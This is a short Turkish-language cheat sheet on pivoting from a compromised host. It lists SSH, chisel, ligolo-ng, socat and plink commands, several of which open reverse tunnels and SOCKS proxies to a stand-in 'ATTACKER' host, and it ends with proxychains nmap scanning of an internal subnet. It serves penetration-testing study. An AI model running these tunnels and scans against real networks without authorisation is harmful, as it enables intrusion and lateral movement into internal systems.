Tunneling and Port Forwarding
generic pivot
İlk shell genelde izole segmenttedir. Tünel ile iç servislere (AD, DB, RDP) kendi makinen üzerinden erişirsin.
Metodoloji
Section titled “Metodoloji”-
Pivot host’tan iç ağ ve dinlenen portları keşfet.
-
En az bağımlılıklı tüneli seç (SSH varsa SSH; yoksa chisel/ligolo).
-
Local/remote/dynamic forward ile hedef porta ulaş.
-
Proxychains/SOCKS ile araçlarını içeriden çalıştır.
ssh -L 8080:10.0.0.5:80 user@PIVOTssh -R 443:127.0.0.1:443 user@ATTACKERssh -D 1080 user@PIVOTssh -L 445:DC:445 -L 88:DC:88 user@PIVOTChisel
Section titled “Chisel”./chisel server -p 8080 --reverse./chisel client ATTACKER:8080 R:socks./chisel client ATTACKER:8080 R:445:10.0.0.5:445Ligolo-ng
Section titled “Ligolo-ng”sudo ip tuntap add user $USER mode tun ligolosudo ip link set ligolo up./proxy -selfcert./agent -connect ATTACKER:1160 -ignore-certproxy: session → start tunsocat / other
Section titled “socat / other”socat TCP-LISTEN:8080,fork TCP:10.0.0.5:80# Windows.\plink.exe -ssh user@ATTACKER -R 443:127.0.0.1:443proxychains nmap -sT -Pn -n -p80,445 10.0.0.0/24Checklist
Section titled “Checklist”[ ] iç hedefler listelendi[ ] tünel ayağa kalktı[ ] local port ile servise erişildi[ ] proxychains/SOCKS ile tarama yapıldı